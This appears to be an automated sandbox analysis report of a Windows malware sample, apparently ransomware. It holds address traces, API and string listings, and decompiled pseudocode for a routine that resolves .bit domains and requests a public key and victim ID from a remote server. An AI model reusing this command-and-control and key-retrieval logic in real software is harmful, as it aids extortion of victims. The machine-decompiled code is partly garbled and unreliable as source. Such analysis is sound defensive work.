0x0041eea6
0x0041eeab
0x0041eeac
0x0041eeac
0x0041eebc
0x0041eec1
0x0041eec4
0x0041eecc
0x0041eed4
0x0041eed9
0x0041eee1
0x0041eee1
0x0041eee3
0x0041eee7
0x0041eee7
0x0041eeea
0x0041eeed
0x0041eef3
0x0041eef5
0x0041eef8
0x0041eef8
0x0041eefa
0x0041eefb
0x0041eefb
0x0041eeff
0x0041eeff
0x00000000
0x0041eeff
0x0041eeef
0x0041ef01
0x0041ef01
0x0041ef07
0x0041ef0c
0x0041ef0d
0x0041ef0d
0x0041ef12
0x0041ef1c
0x0041ef20
0x0041ef24
0x0041ef2b
0x0041ef33
0x0041ef35
0x0041ef40
0x0041ef45
0x0041ef48
0x0041ef4c
0x0041ef4e
0x0041ef4e
0x0041ef50
0x0041ef61
0x0041ef63
0x0041ef68
0x0041ef6e
0x0041ef73
0x0041ef73
0x0041ef76
0x0041ef79
0x0041ef7e
0x0041ef84
0x0041ef88
0x0041ef8f
0x0041ef97
0x0041ef9a
0x0041efa7
0x0041efac
0x0041efaf
0x0041efb3
0x0041efb5
0x0041efb5
0x0041efbf
0x0041efc1
0x0041efc6
0x0041efcc
0x0041efd1
0x0041efd1
0x0041efd4
0x0041efd9
0x0041efe0
0x0041efe6
0x0041efeb
0x0041efeb
0x0041efee
0x0041eff3
0x0041effb
0x0041f003
0x0041f008
0x0041f00e
0x0041f013
0x0041f016
0x0041f01a
0x0041f021
0x0041f025
0x0041f030
0x0041f030
0x0041ee3c
0x0041e6e0
0x0041e6e0
0x0041e6f0
0x0041e6fc
0x0041e707
0x0041e70c
0x0041e70f
0x0041e722
0x00000000
0x0041e724
0x0041e724
0x0041e724
0x0041e722
0x0041e6e0
0x00000000
0x0041ebea
0x0041ebe4
0x0041eb14
0x00000000
0x0041eb14
0x0041ead0
0x0041ead0
0x0041ead8
0x00000000
0x00000000
0x0041eae1
0x0041eae3
0x0041eae5
0x0041eae7
0x00000000
0x00000000
0x00000000
0x0041eae9
0x0041eaeb
0x00000000
0x0041eaeb
0x0041ea46
0x00000000
0x00000000
0x0041ea4c
0x0041ea59
0x0041ea61
0x0041ea74
0x0041ea82
0x0041ea82
0x00000000
0x0041e72e
0x0041e73b
0x0041e749
0x0041e74b
0x0041e755
0x0041e75d
0x0041e762
0x0041e765
0x0041e768
0x0041e76f
0x0041e772
0x0041e778
0x0041e77a
0x0041e77a
0x0041e780
0x0041e780
0x0041e783
0x0041e786
0x0041e789
0x00000000
0x0041e78b
0x0041e78b
0x0041e78b
0x0041e78d
0x00000000
0x0041e78d
0x0041e774
0x0041e774
0x0041e78f
0x0041e78f
0x0041e795
0x0041e79a
0x0041e7a3
0x0041e7a8
0x0041e7ad
0x0041e7ae
0x0041e7b3
0x0041e7b6
0x0041e7b8
0x0041e7be
0x0041e7c3
0x0041e7c5
0x0041e7c7
0x0041e7ce
0x0041e7d6
0x0041e7de
0x0041e7ec
0x0041e7ee
0x0041e7f5
0x0041e7f7
0x0041e80e
0x0041e816
0x0041e81e
0x0041e823
0x0041e827
0x0041e844
0x0041e848
0x0041e829
0x0041e82c
0x0041e82c
0x0041e82d
0x0041e838
0x0041e83d
0x0041e83d
0x0041e82d
0x0041e851
0x0041e858
0x0041e85c
0x0041e85e
0x0041e865
0x0041e86c
0x0041e86c
0x0041e86f
0x0041e874
0x0041e87a
0x0041e87f
0x0041e87f
0x0041e874
0x0041e882
0x0041e88d
0x0041e892
0x0041e895
0x0041e89a
0x0041e89f
0x0041e8a3
0x0041e8aa
0x0041e8b2
0x0041e8b5
0x0041e8ba
0x0041e8c2
0x0041e8c7
0x0041e8ca
0x0041e8cc
0x0041e8d3
0x0041e8db
0x0041e8e0
0x0041e8e5
0x0041e8eb
0x0041e8f0
0x0041e8f0
0x0041e8f3
0x0041e8fc
0x0041e90a
0x0041e910
0x0041e917
0x0041e919
0x0041e920
0x0041e922
0x0041e927
0x0041e92e
0x0041e937
0x0041e930
0x0041e930
0x0041e930
0x0041e93d
0x0041e93d
0x0041e920
0x0041e95a
0x0041e96f
0x0041e975
0x0041e97a
0x0041e97c
0x0041e98c
0x0041e992
0x0041e994
0x0041e9a3
0x0041e9bb
0x0041e9bd
0x0041e9c0
0x0041e9c2
0x0041e9c4
0x0041e9d3
0x0041e9db
0x0041e9dd
0x0041e9de
0x0041e9e3
0x0041e9e4
0x0041e9e9
0x0041e9e9
0x0041e9c2
0x0041e994
0x0041e9f3
0x0041e9f6
0x0041e9f8
0x0041ea03
0x0041ea08
0x0041ea0e
0x0041ea13
0x0041ea13
0x0041ea16
0x0041ea19
0x00000000
0x0041ea19
0x0041e772
0x0041ebf0
0x0041ec00
0x0041ec06
0x0041ec0c
0x0041ec0f
0x0041ec0f
0x0041ec24
0x0041ec32
0x0041e6e0
0x0041e6e0
0x00000000
0x0041e6e6
0x0041edc3
0x0041edc3
0x0041edd3
0x0041edd9
0x0041eddf
0x0041ede2
0x0041ede2
0x0041edf7
0x0041ee05
0x0041ee05

APIs

timeGetTime.WINMM ref: 0041E6C0

Part of subcall function 0040C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
Part of subcall function 0040C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32 ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32 ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32 ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32
lstrlenW.KERNEL32(?), ref: 0041EC3E
lstrlenA.KERNEL32(","id":"), ref: 0041EC51
lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
lstrlenA.KERNEL32(?), ref: 0041EC93
lstrlenA.KERNEL32(00000022), ref: 0041ECB3
lstrcpyW.KERNEL32 ref: 0041ED2A
lstrlenA.KERNEL32(?), ref: 0041ED4B
_malloc.LIBCMT ref: 0041ED55
_memset.LIBCMT ref: 0041ED63
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
lstrcpyW.KERNEL32 ref: 0041ED85
lstrlenW.KERNEL32(?), ref: 0041EDA3
lstrlenW.KERNEL32(?), ref: 0041EDAE
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
DeleteFileA.KERNEL32(?), ref: 0041EE05
_free.LIBCMT ref: 0041EE15
_free.LIBCMT ref: 0041EE22
lstrcpyW.KERNEL32 ref: 0041EF61
lstrcpyW.KERNEL32 ref: 0041EFBF

Strings

&first=false, xrefs: 0041E937
Microsoft Internet Explorer, xrefs: 0041E736
?pid=, xrefs: 0041E884
bowsakkdestx.txt, xrefs: 0041E996, 0041EA67, 0041EC17, 0041EDEA
","id":", xrefs: 0041EBC5, 0041EC4C
{"public_key":", xrefs: 0041EA2E, 0041EA8D
", xrefs: 0041ECA0
.bit/, xrefs: 0041E7A3
&first=true, xrefs: 0041E930

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
API String ID: 704684250-3586605218
Opcode ID: ab0c2a3771126956d15e600cc244ccaba4167f4cf519e74898ab1ace71ecfc18
Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
Opcode Fuzzy Hash: ab0c2a3771126956d15e600cc244ccaba4167f4cf519e74898ab1ace71ecfc18
Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD40 Relevance: 53.2, APIs: 22, Strings: 8, Instructions: 735
stringnetworkmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E0040DD40(char* __ecx, char _a4, intOrPtr _a20, signed int _a24) {
				char _v8;
				intOrPtr _v16;
				char _v17;
				char _v18;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				char _v76;
				signed int _v80;
				char _v84;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				intOrPtr _v124;
				void* _v128;
				signed int _v132;
				short* _v136;
				signed int _v140;
				WCHAR* _v144;
				WCHAR* _v148;
				WCHAR* _v152;
				WCHAR* _v156;
				WCHAR* _v160;
				char _v168;
				char _v172;
				char _v20650;
				short _v20652;
				char _v41130;
				char _v41132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t295;
				void* _t298;
				signed int _t305;
				WCHAR* _t308;
				void* _t309;
				signed int _t314;
				void* _t315;
				signed int _t326;
				signed int _t329;
				WCHAR* _t337;
				intOrPtr* _t344;
				signed int _t347;
				void _t351;
				signed int _t353;
				char* _t355;
				intOrPtr _t356;
				signed int _t362;
				signed int _t379;
				signed int _t387;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				char* _t411;
				signed int _t412;
				signed int _t417;
				signed int _t425;
				signed int _t437;
				intOrPtr* _t438;
				short* _t439;
				signed int _t440;
				signed int _t442;
				signed int _t444;
				void* _t445;
				intOrPtr* _t450;
				signed int _t451;
				signed int _t452;
				char* _t455;
				void* _t457;
				intOrPtr _t459;
				signed int _t462;
				signed int _t463;
				unsigned int _t471;
				signed int _t472;
				char* _t475;
				unsigned int _t484;
				signed int _t485;
				void* _t488;
				intOrPtr* _t493;
				signed int _t494;
				signed int _t496;
				char* _t502;
				void* _t505;
				void* _t509;
				unsigned int _t511;
				unsigned int _t515;
				intOrPtr _t518;
				unsigned int _t520;
				unsigned int _t524;
				signed int _t526;
				signed int _t527;
				void* _t532;
				intOrPtr _t533;
				signed int _t534;
				void* _t538;
				signed int _t539;
				signed int _t540;
				void* _t541;
				signed int _t542;
				signed int _t544;
				signed int _t546;
				signed int _t547;
				void* _t548;
				char* _t551;
				intOrPtr _t553;
				void* _t554;
				signed int _t555;
				signed int _t558;
				char* _t559;
				void* _t560;
				intOrPtr _t561;
				void* _t562;
				void* _t563;
				void* _t564;
				void* _t565;
				char* _t567;

				_t446 = __ecx;
				_push(0xffffffff);
				_push(0x4ca9a8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t561;
				E0042F7C0(0xa0a0);
				_push(_t437);
				_push(_t541);
				_push(_t532);
				_v136 = __ecx;
				_v172 = 0;
				_v8 = 0;
				_push(L"http://");
				_t294 =  >=  ? _a4 :  &_a4;
				_push( >=  ? _a4 :  &_a4);
				_t295 = E00421C02(__ecx);
				_t562 = _t561 + 8;
				if(_t295 != 0) {
					_push(7);
					_t446 =  &_a4;
					E00413340(_t437,  &_a4, _t532, _t541, 0);
				}
				_push(L"https://");
				_t297 =  >=  ? _a4 :  &_a4;
				_push( >=  ? _a4 :  &_a4);
				_t298 = E00421C02(_t446);
				_t563 = _t562 + 8;
				if(_t298 != 0) {
					_push(8);
					E00413340(_t437,  &_a4, _t532, _t541, 0);
				}
				_v41132 = 0;
				E0042B420( &_v41130, 0, 0x4ffe);
				_t533 = lstrlenW;
				_t564 = _t563 + 0xc;
				_t447 = _a24;
				_t542 = 0;
				_t502 = _a4;
				while(1) {
					_t303 =  >=  ? _t502 :  &_a4;
					if(_t542 >= lstrlenW( >=  ? _t502 :  &_a4)) {
						break;
					}
					if(_a20 <= _t542) {
						_push("invalid string position");
						E0044F26C(__eflags);
						L16:
						_t493 = _t502;
						_t52 = _t493 + 1; // 0x1
						_t554 = _t52;
						goto L17;
						L19:
						_push(_t494);
						E004156D0(_t437,  &_v100, _t533, _t502);
						_v8 = 3;
						_t305 =  &_v100;
						_t496 = _v40;
						__eflags = _t305 - _t496;
						if(_t305 >= _t496) {
							L29:
							__eflags = _t496 - _t533;
							if(_t496 == _t533) {
								_t305 = E00415230(_t437,  &_v44, _t533, _t496);
								_t533 = _v36;
								_t496 = _v40;
							}
							__eflags = _t496;
							if(_t496 != 0) {
								 *(_t496 + 0x14) = 0xf;
								 *((intOrPtr*)(_t496 + 0x10)) = 0;
								 *_t496 = 0;
								__eflags = _v80 - 0x10;
								if(_v80 >= 0x10) {
									 *_t496 = _v100;
									_v100 = 0;
								} else {
									_t417 = _v84 + 1;
									__eflags = _t417;
									if(_t417 != 0) {
										E004205A0(_t496,  &_v100, _t417);
										_t496 = _v40;
										_t564 = _t564 + 0xc;
									}
								}
								 *((intOrPtr*)(_t496 + 0x10)) = _v84;
								_t305 = _v80;
								 *(_t496 + 0x14) = _t305;
								_v80 = 0xf;
								_v84 = 0;
								_v100 = 0;
							}
							L37:
							_t447 = _t496 + 0x18;
							_v8 = 2;
							__eflags = _v80 - 0x10;
							_v40 = _t496 + 0x18;
							if(_v80 >= 0x10) {
								_t305 = L00422587(_v100);
								_t564 = _t564 + 4;
							}
							_t555 = _v44;
							L40:
							_t437 = _t437 + 1;
							__eflags = _t437 - 4;
							if(_t437 < 4) {
								L11:
								__imp__#52( *((intOrPtr*)(_t560 + _t437 * 4 - 0x9c)));
								__eflags = _t305;
								if(_t305 == 0) {
									goto L40;
								}
								__eflags =  *((short*)(_t305 + 0xa));
								if( *((short*)(_t305 + 0xa)) <= 0) {
									goto L40;
								}
								_t411 =  *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xc))));
								__imp__#12( *_t411);
								_t502 = _t411;
								_v80 = 0xf;
								_v84 = 0;
								_v100 = 0;
								__eflags =  *_t502;
								if( *_t502 != 0) {
									goto L16;
								} else {
									_t494 = 0;
									goto L19;
								}
							}
							__eflags = _a24 - 8;
							_push("/");
							_t307 =  >=  ? _a4 :  &_a4;
							_push( >=  ? _a4 :  &_a4);
							_t308 = E00421C02(_t447);
							_t565 = _t564 + 8;
							_v144 = _t308;
							_t309 = LocalAlloc(0x40, 8);
							_t534 = _v40;
							_t544 = 0;
							_t438 = _v44;
							_v128 = _t309;
							_v52 = 0;
							_v116 = 0;
							_t314 = (0x2aaaaaab * (_t534 - _t438) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t534 - _t438) >> 0x20 >> 2);
							__eflags = _t314;
							_v108 = _t314;
							if(_t314 == 0) {
								L121:
								_t315 = _v128;
								__eflags = _t315;
								if(_t315 != 0) {
									LocalFree(_t315);
								}
								__imp__DnsFree(_v104, 1);
								_v20652 = 0;
								E0042B420( &_v20650, 0, 0x4ffe);
								_t565 = _t565 + 0xc;
								lstrcpyW( &_v20652, L"http://");
								__eflags = _t544;
								if(_t544 == 0) {
									L130:
									__eflags = _a24 - 8;
									_t322 =  >=  ? _a4 :  &_a4;
									lstrcatW( &_v20652,  >=  ? _a4 :  &_a4);
									goto L131;
								} else {
									_t567 = _t565 - 0x18;
									_t455 = _t567;
									_push(0xffffffff);
									 *(_t455 + 0x14) = 0xf;
									 *((intOrPtr*)(_t455 + 0x10)) = 0;
									 *_t455 = 0;
									E00413FF0(0, _t455, _v32, 0);
									_t337 = E00412900( &_v168, 0);
									_t565 = _t567 + 0x18;
									__eflags = _t337[0xa] - 8;
									if(_t337[0xa] >= 8) {
										_t337 =  *_t337;
									}
									_t544 = lstrcatW;
									lstrcatW( &_v20652, _t337);
									__eflags = _v148 - 8;
									if(_v148 >= 8) {
										L00422587(_v168);
										_t565 = _t565 + 4;
									}
									lstrcatW( &_v20652, _v144);
									L131:
									_t439 = _v136;
									 *((intOrPtr*)(_t439 + 0x14)) = 7;
									 *((intOrPtr*)(_t439 + 0x10)) = 0;
									 *_t439 = 0;
									__eflags = _v20652;
									if(_v20652 != 0) {
										_t450 =  &_v20652;
										_t505 = _t450 + 2;
										do {
											_t326 =  *_t450;
											_t450 = _t450 + 2;
											__eflags = _t326;
										} while (_t326 != 0);
										_t451 = _t450 - _t505;
										__eflags = _t451;
										_t452 = _t451 >> 1;
										L136:
										_push(_t452);
										E00415C10(_t439, _t439, _t534, _t544,  &_v20652);
										_t329 = _v32;
										__eflags = _t329;
										if(_t329 == 0) {
											L144:
											_t440 = _v44;
											__eflags = _t440;
											if(_t440 == 0) {
												L150:
												__eflags = _a24 - 8;
												if(_a24 >= 8) {
													L00422587(_a4);
												}
												 *[fs:0x0] = _v16;
												return _v136;
											}
											_t546 = _t440;
											__eflags = _t440 - _t534;
											if(_t440 == _t534) {
												L149:
												L00422587(_t440);
												_t565 = _t565 + 4;
												goto L150;
											} else {
												goto L146;
											}
											do {
												L146:
												__eflags =  *(_t546 + 0x14) - 0x10;
												if( *(_t546 + 0x14) >= 0x10) {
													L00422587( *_t546);
													_t565 = _t565 + 4;
												}
												 *(_t546 + 0x14) = 0xf;
												 *((intOrPtr*)(_t546 + 0x10)) = 0;
												 *_t546 = 0;
												_t546 = _t546 + 0x18;
												__eflags = _t546 - _t534;
											} while (_t546 != _t534);
											goto L149;
										}
										_t442 = _v28;
										_t547 = _t329;
										__eflags = _t329 - _t442;
										if(_t329 == _t442) {
											L143:
											L00422587(_t329);
											_t565 = _t565 + 4;
											goto L144;
										}
										do {
											__eflags =  *(_t547 + 0x14) - 0x10;
											if( *(_t547 + 0x14) >= 0x10) {
												L00422587( *_t547);
												_t565 = _t565 + 4;
											}
											 *(_t547 + 0x14) = 0xf;
											 *((intOrPtr*)(_t547 + 0x10)) = 0;
											 *_t547 = 0;
											_t547 = _t547 + 0x18;
											__eflags = _t547 - _t442;
										} while (_t547 != _t442);
										_t329 = _v32;
										goto L143;
									}
									_t452 = 0;
									goto L136;
								}
							}
							_t344 = _t438;
							_v124 = _t438;
							do {
								__eflags =  *((intOrPtr*)(_t344 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t344 + 0x14)) >= 0x10) {
									_t344 =  *_t344;
								}
								__imp__#11(_t344);
								_t457 = _v128;
								 *((intOrPtr*)(_t457 + 4)) = _t344;
								 *_t457 = 1;
								__imp__DnsQuery_W( &_v41132, 2, 2, _t457,  &_v104, 0);
								_t347 = _v104;
								_v112 = _t347;
								__eflags = _t347;
								if(_t347 != 0) {
									_t444 = _v28;
									do {
										__imp__#12( *((intOrPtr*)(_t347 + 0x18)));
										_t544 = _t347;
										_v17 = 0;
										_v52 = _t544;
										_v120 = 0;
										_t534 = (0x2aaaaaab * (_t444 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t444 - _v32) >> 0x20 >> 2);
										__eflags = _t534;
										_v140 = _t534;
										if(_t534 == 0) {
											L80:
											_t351 = _v17;
											L81:
											__eflags = _t351;
											if(_t351 != 0) {
												goto L118;
											}
											_v56 = 0xf;
											_v60 = 0;
											_v76 = _t351;
											__eflags =  *_t544 - _t351;
											if( *_t544 != _t351) {
												_t462 = _t544;
												_t168 = _t462 + 1; // 0x1
												_t509 = _t168;
												do {
													_t353 =  *_t462;
													_t462 = _t462 + 1;
													__eflags = _t353;
												} while (_t353 != 0);
												_t463 = _t462 - _t509;
												__eflags = _t463;
												L88:
												_push(_t463);
												E004156D0(_t444,  &_v76, _t534, _t544);
												_t355 =  &_v76;
												_v8 = 4;
												__eflags = _t355 - _t444;
												if(_t355 >= _t444) {
													L103:
													_t356 = _v48;
													__eflags = _t444 - _t356;
													if(_t444 != _t356) {
														L110:
														__eflags = _t444;
														if(_t444 != 0) {
															 *(_t444 + 0x14) = 0xf;
															 *((intOrPtr*)(_t444 + 0x10)) = 0;
															 *_t444 = 0;
															__eflags = _v56 - 0x10;
															if(_v56 >= 0x10) {
																 *_t444 = _v76;
																_v76 = 0;
															} else {
																_t362 = _v60 + 1;
																__eflags = _t362;
																if(_t362 != 0) {
																	E004205A0(_t444,  &_v76, _t362);
																	_t565 = _t565 + 0xc;
																}
															}
															 *((intOrPtr*)(_t444 + 0x10)) = _v60;
															 *(_t444 + 0x14) = _v56;
															_v56 = 0xf;
															_v60 = 0;
															_v76 = 0;
														}
														L116:
														_t444 = _t444 + 0x18;
														_v8 = 2;
														__eflags = _v56 - 0x10;
														_v28 = _t444;
														if(_v56 >= 0x10) {
															L00422587(_v76);
															_t565 = _t565 + 4;
														}
														goto L118;
													}
													_t511 = 0x2aaaaaab * (_t356 - _t444) >> 0x20 >> 2;
													__eflags = (_t511 >> 0x1f) + _t511 - 1;
													if((_t511 >> 0x1f) + _t511 >= 1) {
														goto L110;
													}
													__eflags = 0xaaaaaaa - _t534 - 1;
													if(__eflags < 0) {
														L129:
														_push("vector<T> too long");
														E0044F23E(__eflags);
														goto L130;
													}
													_t548 = _t534 + 1;
													_t471 = (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2);
													_t515 = _t471 >> 1;
													__eflags = 0xaaaaaaa - _t515 - _t471;
													if(0xaaaaaaa - _t515 >= _t471) {
														_t472 = _t471 + _t515;
														__eflags = _t472;
													} else {
														_t472 = 0;
													}
													__eflags = _t472 - _t548;
													_t473 =  <  ? _t548 : _t472;
													__eflags =  <  ? _t548 : _t472;
													E00416360(_t444,  &_v32, _t534, _t548,  <  ? _t548 : _t472);
													_t444 = _v28;
													_v48 = _v24;
													goto L110;
												}
												_t475 = _t355;
												_t379 = _v32;
												__eflags = _t379 - _t475;
												if(_t379 > _t475) {
													goto L103;
												}
												_t544 = (0x2aaaaaab * (_t475 - _t379) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t475 - _t379) >> 0x20 >> 2);
												_t518 = _v48;
												__eflags = _t444 - _t518;
												if(_t444 != _t518) {
													L97:
													_t551 = _v32 + (_t544 + _t544 * 2) * 8;
													__eflags = _t444;
													if(_t444 != 0) {
														 *(_t444 + 0x14) = 0xf;
														 *((intOrPtr*)(_t444 + 0x10)) = 0;
														 *_t444 = 0;
														__eflags =  *(_t551 + 0x14) - 0x10;
														if( *(_t551 + 0x14) >= 0x10) {
															 *_t444 =  *_t551;
															 *_t551 = 0;
														} else {
															_t387 =  *((intOrPtr*)(_t551 + 0x10)) + 1;
															__eflags = _t387;
															if(_t387 != 0) {
																E004205A0(_t444, _t551, _t387);
																_t565 = _t565 + 0xc;
															}
														}
														 *((intOrPtr*)(_t444 + 0x10)) =  *((intOrPtr*)(_t551 + 0x10));
														 *(_t444 + 0x14) =  *(_t551 + 0x14);
														 *(_t551 + 0x14) = 0xf;
														 *((intOrPtr*)(_t551 + 0x10)) = 0;
														 *_t551 = 0;
													}
													goto L116;
												}
												_t520 = 0x2aaaaaab * (_t518 - _t444) >> 0x20 >> 2;
												__eflags = (_t520 >> 0x1f) + _t520 - 1;
												if((_t520 >> 0x1f) + _t520 >= 1) {
													goto L97;
												}
												__eflags = 0xaaaaaaa - _t534 - 1;
												if(__eflags < 0) {
													goto L129;
												}
												_t538 = _t534 + 1;
												_t484 = (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2);
												_t524 = _t484 >> 1;
												__eflags = 0xaaaaaaa - _t524 - _t484;
												if(0xaaaaaaa - _t524 >= _t484) {
													_t485 = _t484 + _t524;
													__eflags = _t485;
												} else {
													_t485 = 0;
												}
												__eflags = _t485 - _t538;
												_t486 =  <  ? _t538 : _t485;
												E00416360(_t444,  &_v32, _t538, _t544,  <  ? _t538 : _t485);
												_t444 = _v28;
												_v48 = _v24;
												goto L97;
											}
											_t463 = 0;
											goto L88;
										}
										_t402 =  *_t544;
										_t526 = _v32 + 0x10;
										__eflags = _t526;
										_v18 = _t402;
										_v132 = _t526;
										do {
											__eflags = _t402;
											if(_t402 != 0) {
												_t539 = _t544;
												_t141 = _t539 + 1; // 0x1
												_t488 = _t141;
												do {
													_t403 =  *_t539;
													_t539 = _t539 + 1;
													__eflags = _t403;
												} while (_t403 != 0);
												_t540 = _t539 - _t488;
												__eflags = _t540;
												L54:
												__eflags =  *((intOrPtr*)(_t526 + 4)) - 0x10;
												_t445 =  *_t526;
												if( *((intOrPtr*)(_t526 + 4)) < 0x10) {
													_t527 = _t526 + 0xfffffff0;
													__eflags = _t527;
												} else {
													_t527 =  *(_t526 - 0x10);
												}
												__eflags = _t445 - _t540;
												_t405 =  <  ? _t445 : _t540;
												__eflags = _t405;
												if(_t405 == 0) {
													L73:
													__eflags = _t445 - _t540;
													if(_t445 >= _t540) {
														__eflags = _t445 - _t540;
														_t151 = _t445 != _t540;
														__eflags = _t151;
														_t407 = 0 | _t151;
													} else {
														_t407 = _t405 | 0xffffffff;
													}
													__eflags = _t407;
													goto L77;
												} else {
													_t409 = _t405 - 4;
													__eflags = _t409;
													if(_t409 < 0) {
														L62:
														__eflags = _t409 - 0xfffffffc;
														if(_t409 == 0xfffffffc) {
															L71:
															_t407 = 0;
															__eflags = 0;
															L72:
															__eflags = _t407;
															if(__eflags != 0) {
																L77:
																_t534 = _v140;
																if(__eflags != 0) {
																	_t444 = _v28;
																	_t351 = 1;
																	_t544 = _v52;
																	goto L81;
																}
																goto L78;
															}
															goto L73;
														}
														L63:
														__eflags =  *_t527 -  *_t544;
														if( *_t527 !=  *_t544) {
															L70:
															asm("sbb eax, eax");
															_t407 = _t409 | 0x00000001;
															goto L72;
														}
														__eflags = _t409 - 0xfffffffd;
														if(_t409 == 0xfffffffd) {
															goto L71;
														}
														__eflags =  *((intOrPtr*)(_t527 + 1)) -  *((intOrPtr*)(_t544 + 1));
														if( *((intOrPtr*)(_t527 + 1)) !=  *((intOrPtr*)(_t544 + 1))) {
															goto L70;
														}
														__eflags = _t409 - 0xfffffffe;
														if(_t409 == 0xfffffffe) {
															goto L71;
														}
														__eflags =  *((intOrPtr*)(_t527 + 2)) -  *((intOrPtr*)(_t544 + 2));
														if( *((intOrPtr*)(_t527 + 2)) !=  *((intOrPtr*)(_t544 + 2))) {
															goto L70;
														}
														__eflags = _t409 - 0xffffffff;
														if(_t409 == 0xffffffff) {
															goto L71;
														}
														_t409 =  *((intOrPtr*)(_t527 + 3));
														__eflags = _t409 -  *((intOrPtr*)(_t544 + 3));
														if(_t409 ==  *((intOrPtr*)(_t544 + 3))) {
															goto L71;
														}
														goto L70;
													}
													while(1) {
														__eflags =  *_t527 -  *_t544;
														if( *_t527 !=  *_t544) {
															goto L63;
														}
														_t527 = _t527 + 4;
														_t544 = _t544 + 4;
														_t409 = _t409 - 4;
														__eflags = _t409;
														if(_t409 >= 0) {
															continue;
														}
														goto L62;
													}
													goto L63;
												}
											}
											_t540 = 0;
											goto L54;
											L78:
											_t553 = _v120 + 1;
											_t402 = _v18;
											_t526 = _v132 + 0x18;
											_v120 = _t553;
											__eflags = _t553 - _t534;
											_t544 = _v52;
											_v132 = _t526;
										} while (_t553 < _t534);
										_t444 = _v28;
										goto L80;
										L118:
										_t347 =  *_v112;
										_v112 = _t347;
										__eflags = _t347;
									} while (_t347 != 0);
								}
								_t459 = _v116 + 1;
								_t344 = _v124 + 0x18;
								_v116 = _t459;
								_v124 = _t344;
								__eflags = _t459 - _v108;
							} while (_t459 < _v108);
							_t544 = _v52;
